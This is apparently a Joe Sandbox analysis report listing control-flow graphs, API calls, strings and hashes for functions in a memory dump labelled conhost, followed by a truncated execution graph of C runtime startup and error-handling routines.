                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000040.00000002.2596139121.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    • Associated: 00000040.00000002.2596088889.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596200164.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596242172.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596323916.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_64_2_140000000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2643109117-0
                                                                                                    • Opcode ID: 3e47b941a18d40a05cf5dbb4c3716eebdba2920780b0a3dae55f15ebab0588eb
                                                                                                    • Instruction ID: 59287579fd2cbbe1d8a3e4f08483d7eb513d4c53ed15668fa93f54147bc8dcd6
                                                                                                    • Opcode Fuzzy Hash: 3e47b941a18d40a05cf5dbb4c3716eebdba2920780b0a3dae55f15ebab0588eb
                                                                                                    • Instruction Fuzzy Hash: D75112F1611A4085FB16EF67F9947EA27A1BB8CBD0F449121FB4E873B2DE3884958700
                                                                                                    Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 499 140001ba0-140001bc0 500 140001bc2-140001bd7 499->500 501 140001c09 499->501 502 140001be9-140001bf1 500->502 503 140001c0c-140001c17 call 1400023b0 501->503 504 140001bf3-140001c02 502->504 505 140001be0-140001be7 502->505 509 140001cf4-140001cfe call 140001d40 503->509 510 140001c1d-140001c6c call 1400024d0 VirtualQuery 503->510 504->505 508 140001c04 504->508 505->502 505->503 511 140001cd7-140001cf3 memcpy 508->511 514 140001d03-140001d1e call 140001d40 509->514 510->514 517 140001c72-140001c79 510->517 518 140001d23-140001d38 GetLastError call 140001d40 514->518 519 140001c7b-140001c7e 517->519 520 140001c8e-140001c97 517->520 522 140001cd1 519->522 523 140001c80-140001c83 519->523 524 140001ca4-140001ccf VirtualProtect 520->524 525 140001c99-140001c9c 520->525 522->511 523->522 527 140001c85-140001c8a 523->527 524->518 524->522 525->522 528 140001c9e 525->528 527->522 529 140001c8c 527->529 528->524 529->528
                                                                                                    APIs
                                                                                                    • VirtualQuery.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                                                    • memcpy.MSVCRT ref: 0000000140001CE0
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000040.00000002.2596139121.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    • Associated: 00000040.00000002.2596088889.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596200164.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596242172.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596323916.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_64_2_140000000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                    • API String ID: 2595394609-2123141913
                                                                                                    • Opcode ID: 33d5b868e8eebb6b2cff367d03fabe1666b92cc2c7a1d8284b12e8b2d2f01650
                                                                                                    • Instruction ID: 8fe685864c950126c70aef331d4ef6a473e45b0d851c9b376e186f7e6f8e001c
                                                                                                    • Opcode Fuzzy Hash: 33d5b868e8eebb6b2cff367d03fabe1666b92cc2c7a1d8284b12e8b2d2f01650
                                                                                                    • Instruction Fuzzy Hash: F54132B1601A4486FA66DF57F884BE927A0F78DBC4F554126EF0E877B1DA38C586C700
                                                                                                    Function 0000000140002104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 530 140002104-14000210b 531 140002111-140002128 EnterCriticalSection 530->531 532 140002218-140002221 530->532 535 14000220b-140002212 LeaveCriticalSection 531->535 536 14000212e-14000213c 531->536 533 140002272-140002280 532->533 534 140002223-14000222d 532->534 537 140002241-140002263 DeleteCriticalSection 534->537 538 14000222f 534->538 535->532 539 14000214d-140002159 TlsGetValue GetLastError 536->539 537->533 540 140002230-14000223f free 538->540 541 14000215b-14000215e 539->541 542 140002140-140002147 539->542 540->537 540->540 541->542 543 140002160-14000216d 541->543 542->535 542->539 543->542
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000040.00000002.2596139121.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    • Associated: 00000040.00000002.2596088889.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596200164.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596242172.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596323916.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_64_2_140000000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                                                    • String ID:
                                                                                                    • API String ID: 3326252324-0
                                                                                                    • Opcode ID: d08e14779ef784e5b274f9410f1df34d10b7f9b45ed8462817a217195fc6686c
                                                                                                    • Instruction ID: e40e1da60a1a5d331dd26ba47eda995497d599188102bfe9744f788749b46c7b
                                                                                                    • Opcode Fuzzy Hash: d08e14779ef784e5b274f9410f1df34d10b7f9b45ed8462817a217195fc6686c
                                                                                                    • Instruction Fuzzy Hash: B821F5B0305A0192FA6BEB53F9483E823A4BB6CBD0F444121FF5A476B4DB79C986C300
                                                                                                    Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 545 140001e10-140001e2d 546 140001e3e-140001e48 545->546 547 140001e2f-140001e38 545->547 549 140001ea3-140001ea8 546->549 550 140001e4a-140001e53 546->550 547->546 548 140001f60-140001f69 547->548 549->548 553 140001eae-140001eb3 549->553 551 140001e55-140001e60 550->551 552 140001ecc-140001ed1 550->552 551->549 554 140001f23-140001f2d 552->554 555 140001ed3-140001ee2 signal 552->555 556 140001eb5-140001eba 553->556 557 140001efb-140001f0a call 140006bf0 553->557 560 140001f43-140001f45 554->560 561 140001f2f-140001f3f 554->561 555->554 558 140001ee4-140001ee8 555->558 556->548 562 140001ec0 556->562 557->554 566 140001f0c-140001f10 557->566 563 140001eea-140001ef9 signal 558->563 564 140001f4e-140001f53 558->564 560->548 561->560 562->554 563->548 567 140001f5a 564->567 568 140001f12-140001f21 signal 566->568 569 140001f55 566->569 567->548 568->548 569->567
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000040.00000002.2596139121.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    • Associated: 00000040.00000002.2596088889.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596200164.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596242172.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596323916.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_64_2_140000000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: CCG
                                                                                                    • API String ID: 0-1584390748
                                                                                                    • Opcode ID: 35b4906de10c631e66e3b23b94ad5b459cb4b8ee30e741b9a85039f9bcae7566
                                                                                                    • Instruction ID: 7d6232b93d6e17ed90188a579955942f9e6f6d73f73cd7587163c1a56a44d235
                                                                                                    • Opcode Fuzzy Hash: 35b4906de10c631e66e3b23b94ad5b459cb4b8ee30e741b9a85039f9bcae7566
                                                                                                    • Instruction Fuzzy Hash: 592139B1A0150542FA77DA2BB9A03F92192ABCC7E4F258535BF19873F5DF3888C28241
                                                                                                    Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 570 140001880-14000189c 571 1400018a2-1400018f9 call 140002420 call 140002660 570->571 572 140001a0f-140001a1f 570->572 571->572 577 1400018ff-140001910 571->577 578 140001912-14000191c 577->578 579 14000193e-140001941 577->579 580 14000194d-140001954 578->580 581 14000191e-140001929 578->581 579->580 582 140001943-140001947 579->582 585 140001956-140001961 580->585 586 14000199e-1400019a6 580->586 581->580 583 14000192b-14000193a 581->583 582->580 584 140001a20-140001a26 582->584 583->579 587 140001b87-140001b98 call 140001d40 584->587 588 140001a2c-140001a37 584->588 589 140001970-14000199c call 140001ba0 585->589 586->572 590 1400019a8-1400019c1 586->590 588->586 591 140001a3d-140001a5f 588->591 589->586 594 1400019df-1400019e7 590->594 597 140001a7d-140001a97 591->597 595 1400019e9-140001a0d VirtualProtect 594->595 596 1400019d0-1400019dd 594->596 595->596 596->572 596->594 600 140001b74-140001b82 call 140001d40 597->600 601 140001a9d-140001afa 597->601 600->587 607 140001b22-140001b26 601->607 608 140001afc-140001b0e 601->608 611 140001b2c-140001b30 607->611 612 140001a70-140001a77 607->612 609 140001b5c-140001b6c 608->609 610 140001b10-140001b20 608->610 609->600 614 140001b6f call 140001d40 609->614 610->607 610->609 611->612 613 140001b36-140001b57 call 140001ba0 611->613 612->586 612->597 613->609 614->600
                                                                                                    APIs
                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000040.00000002.2596139121.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    • Associated: 00000040.00000002.2596088889.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596200164.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596242172.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596323916.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_64_2_140000000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProtectVirtual
                                                                                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                                    • API String ID: 544645111-395989641
                                                                                                    • Opcode ID: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                                                                                    • Instruction ID: 78106683dca420d487733eb45b5c7fb140555e26720c20ee5b0ca44718aa059e
                                                                                                    • Opcode Fuzzy Hash: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                                                                                    • Instruction Fuzzy Hash: F05105B6B11544DAEB16CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700
                                                                                                    Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 618 140001800-140001810 619 140001812-140001822 618->619 620 140001824 618->620 621 14000182b-140001867 call 140002290 fprintf 619->621 620->621
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000040.00000002.2596139121.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    • Associated: 00000040.00000002.2596088889.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596200164.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596242172.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596323916.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_64_2_140000000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fprintf
                                                                                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                    • API String ID: 383729395-3474627141
                                                                                                    • Opcode ID: 6e962bcb0f052a0dea548b3bc938a4dc15a218e64a80b598041495bfab8aa735
                                                                                                    • Instruction ID: 88266abc16e5ce81ea68448ecf712b8cc9874a99fed6f92d18931fad02326cff
                                                                                                    • Opcode Fuzzy Hash: 6e962bcb0f052a0dea548b3bc938a4dc15a218e64a80b598041495bfab8aa735
                                                                                                    • Instruction Fuzzy Hash: 79F09671A14A4482E612EF6AB9417EDA361E75D7C1F50D211FF4DA76A1DF3CD182C310
                                                                                                    Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 624 14000219e-1400021a5 625 140002272-140002280 624->625 626 1400021ab-1400021c2 EnterCriticalSection 624->626 627 140002265-14000226c LeaveCriticalSection 626->627 628 1400021c8-1400021d6 626->628 627->625 629 1400021e9-1400021f5 TlsGetValue GetLastError 628->629 630 1400021f7-1400021fa 629->630 631 1400021e0-1400021e7 629->631 630->631 632 1400021fc-140002209 630->632 631->627 631->629 632->631
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000040.00000002.2596139121.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    • Associated: 00000040.00000002.2596088889.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596200164.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596242172.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000040.00000002.2596323916.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_64_2_140000000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 682475483-0
                                                                                                    • Opcode ID: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                                                                                    • Instruction ID: 8e95c5bf1582c2fa6f49c61d441952bd59d504a178f2dce2e4bc026802320bcf
                                                                                                    • Opcode Fuzzy Hash: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                                                                                    • Instruction Fuzzy Hash: 6501F2B5305A0082FA2BDB53FE083D82364BB6CBD0F454021EF0943AB4DB79C996C300

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:10.3%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0.6%
                                                                                                    Total number of Nodes:2000
                                                                                                    Total number of Limit Nodes:75
                                                                                                    execution_graph 19836 7ff75aeac590 19847 7ff75aeb0348 EnterCriticalSection 19836->19847 20510 7ff75aea5480 20511 7ff75aea548b 20510->20511 20519 7ff75aeaf314 20511->20519 20532 7ff75aeb0348 EnterCriticalSection 20519->20532 19492 7ff75aeaf9fc 19493 7ff75aeafbee 19492->19493 19496 7ff75aeafa3e _isindst 19492->19496 19494 7ff75aea4f78 _set_fmode 11 API calls 19493->19494 19495 7ff75aeafbde 19494->19495 19497 7ff75ae9c5c0 _log10_special 8 API calls 19495->19497 19496->19493 19499 7ff75aeafabe _isindst 19496->19499 19498 7ff75aeafc09 19497->19498 19513 7ff75aeb6204 19499->19513 19504 7ff75aeafc1a 19506 7ff75aeaa970 _isindst 17 API calls 19504->19506 19508 7ff75aeafc2e 19506->19508 19511 7ff75aeafb1b 19511->19495 19537 7ff75aeb6248 19511->19537 19514 7ff75aeb6213 19513->19514 19518 7ff75aeafadc 19513->19518 19544 7ff75aeb0348 EnterCriticalSection 19514->19544 19519 7ff75aeb5608 19518->19519 19520 7ff75aeb5611 19519->19520 19521 7ff75aeafaf1 19519->19521 19522 7ff75aea4f78 _set_fmode 11 API calls 19520->19522 19521->19504 19525 7ff75aeb5638 19521->19525 19523 7ff75aeb5616 19522->19523 19524 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 19523->19524 19524->19521 19526 7ff75aeb5641 19525->19526 19527 7ff75aeafb02 19525->19527 19528 7ff75aea4f78 _set_fmode 11 API calls 19526->19528 19527->19504 19531 7ff75aeb5668 19527->19531 19529 7ff75aeb5646 19528->19529 19530 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 19529->19530 19530->19527 19532 7ff75aeb5671 19531->19532 19536 7ff75aeafb13 19531->19536 19533 7ff75aea4f78 _set_fmode 11 API calls 19532->19533 19534 7ff75aeb5676 19533->19534 19535 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 19534->19535 19535->19536 19536->19504 19536->19511 19545 7ff75aeb0348 EnterCriticalSection 19537->19545 20546 7ff75aebae6e 20547 7ff75aebae87 20546->20547 20548 7ff75aebae7d 20546->20548 20550 7ff75aeb03a8 LeaveCriticalSection 20548->20550 19649 7ff75aebadd9 19652 7ff75aea54e8 LeaveCriticalSection 19649->19652 15918 7ff75aea99d1 15930 7ff75aeaa448 15918->15930 15935 7ff75aeab1c0 GetLastError 15930->15935 15936 7ff75aeab201 FlsSetValue 15935->15936 15937 7ff75aeab1e4 FlsGetValue 15935->15937 15939 7ff75aeab213 15936->15939 15940 7ff75aeab1f1 SetLastError 15936->15940 15938 7ff75aeab1fb 15937->15938 15937->15940 15938->15936 15966 7ff75aeaec08 15939->15966 15943 7ff75aeaa451 15940->15943 15944 7ff75aeab28d 15940->15944 15957 7ff75aeaa574 15943->15957 15946 7ff75aeaa574 __CxxCallCatchBlock 38 API calls 15944->15946 15949 7ff75aeab292 15946->15949 15947 7ff75aeab240 FlsSetValue 15951 7ff75aeab25e 15947->15951 15952 7ff75aeab24c FlsSetValue 15947->15952 15948 7ff75aeab230 FlsSetValue 15950 7ff75aeab239 15948->15950 15973 7ff75aeaa9b8 15950->15973 15979 7ff75aeaaf64 15951->15979 15952->15950 16027 7ff75aeb36c0 15957->16027 15971 7ff75aeaec19 _set_fmode 15966->15971 15967 7ff75aeaec6a 15987 7ff75aea4f78 15967->15987 15968 7ff75aeaec4e HeapAlloc 15969 7ff75aeab222 15968->15969 15968->15971 15969->15947 15969->15948 15971->15967 15971->15968 15984 7ff75aeb3600 15971->15984 15974 7ff75aeaa9bd RtlFreeHeap 15973->15974 15978 7ff75aeaa9ec 15973->15978 15975 7ff75aeaa9d8 GetLastError 15974->15975 15974->15978 15976 7ff75aeaa9e5 Concurrency::details::SchedulerProxy::DeleteThis 15975->15976 15977 7ff75aea4f78 _set_fmode 9 API calls 15976->15977 15977->15978 15978->15940 16013 7ff75aeaae3c 15979->16013 15990 7ff75aeb3640 15984->15990 15996 7ff75aeab338 GetLastError 15987->15996 15989 7ff75aea4f81 15989->15969 15995 7ff75aeb0348 EnterCriticalSection 15990->15995 15997 7ff75aeab379 FlsSetValue 15996->15997 16002 7ff75aeab35c 15996->16002 15998 7ff75aeab38b 15997->15998 16003 7ff75aeab369 15997->16003 16000 7ff75aeaec08 _set_fmode 5 API calls 15998->16000 15999 7ff75aeab3e5 SetLastError 15999->15989 16001 7ff75aeab39a 16000->16001 16004 7ff75aeab3b8 FlsSetValue 16001->16004 16005 7ff75aeab3a8 FlsSetValue 16001->16005 16002->15997 16002->16003 16003->15999 16007 7ff75aeab3d6 16004->16007 16008 7ff75aeab3c4 FlsSetValue 16004->16008 16006 7ff75aeab3b1 16005->16006 16009 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16006->16009 16010 7ff75aeaaf64 _set_fmode 5 API calls 16007->16010 16008->16006 16009->16003 16011 7ff75aeab3de 16010->16011 16012 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16011->16012 16012->15999 16025 7ff75aeb0348 EnterCriticalSection 16013->16025 16061 7ff75aeb3678 16027->16061 16066 7ff75aeb0348 EnterCriticalSection 16061->16066 16131 7ff75ae9bb50 16132 7ff75ae9bb65 16131->16132 16133 7ff75ae9bb7e 16131->16133 16132->16133 16136 7ff75aead66c 16132->16136 16137 7ff75aead6b7 16136->16137 16142 7ff75aead67b _set_fmode 16136->16142 16139 7ff75aea4f78 _set_fmode 11 API calls 16137->16139 16138 7ff75aead69e HeapAlloc 16140 7ff75ae9bbde 16138->16140 16138->16142 16139->16140 16141 7ff75aeb3600 _set_fmode 2 API calls 16141->16142 16142->16137 16142->16138 16142->16141 20552 7ff75aebac53 20553 7ff75aebac63 20552->20553 20556 7ff75aea54e8 LeaveCriticalSection 20553->20556 19689 7ff75ae9cbc0 19690 7ff75ae9cbd0 19689->19690 19706 7ff75aea9c18 19690->19706 19692 7ff75ae9cbdc 19712 7ff75ae9ceb8 19692->19712 19694 7ff75ae9d19c 7 API calls 19696 7ff75ae9cc75 19694->19696 19695 7ff75ae9cbf4 _RTC_Initialize 19704 7ff75ae9cc49 19695->19704 19717 7ff75ae9d068 19695->19717 19698 7ff75ae9cc09 19720 7ff75aea9084 19698->19720 19704->19694 19705 7ff75ae9cc65 19704->19705 19707 7ff75aea9c29 19706->19707 19708 7ff75aea4f78 _set_fmode 11 API calls 19707->19708 19709 7ff75aea9c31 19707->19709 19710 7ff75aea9c40 19708->19710 19709->19692 19711 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 19710->19711 19711->19709 19713 7ff75ae9cec9 19712->19713 19716 7ff75ae9cece __scrt_acquire_startup_lock 19712->19716 19714 7ff75ae9d19c 7 API calls 19713->19714 19713->19716 19715 7ff75ae9cf42 19714->19715 19716->19695 19745 7ff75ae9d02c 19717->19745 19719 7ff75ae9d071 19719->19698 19721 7ff75aea90a4 19720->19721 19735 7ff75ae9cc15 19720->19735 19722 7ff75aea90c2 GetModuleFileNameW 19721->19722 19723 7ff75aea90ac 19721->19723 19727 7ff75aea90ed 19722->19727 19724 7ff75aea4f78 _set_fmode 11 API calls 19723->19724 19725 7ff75aea90b1 19724->19725 19726 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 19725->19726 19726->19735 19760 7ff75aea9024 19727->19760 19730 7ff75aea9135 19731 7ff75aea4f78 _set_fmode 11 API calls 19730->19731 19732 7ff75aea913a 19731->19732 19733 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19732->19733 19733->19735 19734 7ff75aea914d 19737 7ff75aea919b 19734->19737 19739 7ff75aea91b4 19734->19739 19743 7ff75aea916f 19734->19743 19735->19704 19744 7ff75ae9d13c InitializeSListHead 19735->19744 19736 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19736->19735 19738 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19737->19738 19740 7ff75aea91a4 19738->19740 19741 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19739->19741 19742 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19740->19742 19741->19743 19742->19735 19743->19736 19746 7ff75ae9d046 19745->19746 19748 7ff75ae9d03f 19745->19748 19749 7ff75aeaa25c 19746->19749 19748->19719 19752 7ff75aea9e98 19749->19752 19759 7ff75aeb0348 EnterCriticalSection 19752->19759 19761 7ff75aea903c 19760->19761 19765 7ff75aea9074 19760->19765 19762 7ff75aeaec08 _set_fmode 11 API calls 19761->19762 19761->19765 19763 7ff75aea906a 19762->19763 19764 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19763->19764 19764->19765 19765->19730 19765->19734 19766 7ff75aea9dc0 19769 7ff75aea9d3c 19766->19769 19776 7ff75aeb0348 EnterCriticalSection 19769->19776 20557 7ff75aeab040 20558 7ff75aeab05a 20557->20558 20559 7ff75aeab045 20557->20559 20563 7ff75aeab060 20559->20563 20564 7ff75aeab0a2 20563->20564 20565 7ff75aeab0aa 20563->20565 20566 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20564->20566 20567 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20565->20567 20566->20565 20568 7ff75aeab0b7 20567->20568 20569 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20568->20569 20570 7ff75aeab0c4 20569->20570 20571 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20570->20571 20572 7ff75aeab0d1 20571->20572 20573 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20572->20573 20574 7ff75aeab0de 20573->20574 20575 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20574->20575 20576 7ff75aeab0eb 20575->20576 20577 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20576->20577 20578 7ff75aeab0f8 20577->20578 20579 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20578->20579 20580 7ff75aeab105 20579->20580 20581 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20580->20581 20582 7ff75aeab115 20581->20582 20583 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20582->20583 20584 7ff75aeab125 20583->20584 20589 7ff75aeaaf04 20584->20589 20603 7ff75aeb0348 EnterCriticalSection 20589->20603 16390 7ff75aeb0938 16391 7ff75aeb095c 16390->16391 16394 7ff75aeb096c 16390->16394 16392 7ff75aea4f78 _set_fmode 11 API calls 16391->16392 16393 7ff75aeb0961 16392->16393 16395 7ff75aeb0c4c 16394->16395 16396 7ff75aeb098e 16394->16396 16397 7ff75aea4f78 _set_fmode 11 API calls 16395->16397 16398 7ff75aeb09af 16396->16398 16539 7ff75aeb0ff4 16396->16539 16399 7ff75aeb0c51 16397->16399 16402 7ff75aeb0a21 16398->16402 16403 7ff75aeb09d5 16398->16403 16419 7ff75aeb0a15 16398->16419 16401 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16399->16401 16401->16393 16405 7ff75aeaec08 _set_fmode 11 API calls 16402->16405 16417 7ff75aeb09e4 16402->16417 16554 7ff75aea9730 16403->16554 16407 7ff75aeb0a37 16405->16407 16411 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16407->16411 16409 7ff75aeb0ace 16414 7ff75aeb0aeb 16409->16414 16420 7ff75aeb0b3d 16409->16420 16410 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16410->16393 16415 7ff75aeb0a45 16411->16415 16412 7ff75aeb09df 16416 7ff75aea4f78 _set_fmode 11 API calls 16412->16416 16413 7ff75aeb09fd 16413->16419 16422 7ff75aeb0ff4 45 API calls 16413->16422 16418 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16414->16418 16415->16417 16415->16419 16424 7ff75aeaec08 _set_fmode 11 API calls 16415->16424 16416->16417 16417->16410 16421 7ff75aeb0af4 16418->16421 16419->16409 16419->16417 16560 7ff75aeb719c 16419->16560 16420->16417 16423 7ff75aeb344c 40 API calls 16420->16423 16430 7ff75aeb0af9 16421->16430 16596 7ff75aeb344c 16421->16596 16422->16419 16425 7ff75aeb0b7a 16423->16425 16427 7ff75aeb0a67 16424->16427 16428 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16425->16428 16432 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16427->16432 16433 7ff75aeb0b84 16428->16433 16429 